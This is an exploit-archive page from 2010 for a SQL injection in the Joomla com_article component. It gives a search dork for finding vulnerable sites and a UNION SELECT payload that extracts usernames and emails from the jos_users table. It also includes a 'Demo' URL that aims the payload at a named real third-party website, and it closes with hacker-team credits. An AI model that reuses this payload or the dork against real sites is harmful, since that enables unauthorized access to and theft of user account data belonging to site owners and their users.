Exploit | Joomla com_article SQL injection Vulnerability

Exploits Code

24-01-2010 Joomla com_article SQL injection Vulnerability

==============================================================================
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             

==============================================================================
        [&#65533;] ~ Note : : <3 v4sploiter
==============================================================================
        [&#65533;] Joomla (com_article) SQL injection Vulnerability 
==============================================================================

	[&#65533;] Script:             [ Joomla Comp ]
	[&#65533;] Language:           [ PHP ]
    [&#65533;] Dork:               [ inurl:"com_book" ]
	[&#65533;] Founder:            [ Evil-Cod3r ]
    [&#65533;] Gr44tz:             [ v4sploiter - Mr.SaFa7 - Red Virus - Mn7os - Recruit - Mr.Skull ]
    [&#65533;] Team:               [ v4-Team.com/cc ]
    [&#65533;] Price:              [ Free ]
###########################################################################

http://localhost/path/index.php?option=com_article&id=Exploit 

 Exploit : -

index.php?option=com_article&id=-185 Union All Select concat(username,0x3a,email),2,3,4,5,6,7 from jos_users--

Demo :

http://www.utp.fr/index.php?option=com_article&id=-185%20Union%20All%20Select%20concat%28username,0x3a,email%29,2,3,4,5,6,7%20from%20jos_users--

Author: Evil-Cod3r

###########################################################################

Exploits by Month (2010)

Mar (18) Feb (9) Jan (30)

TS Promotion

Privacy Statement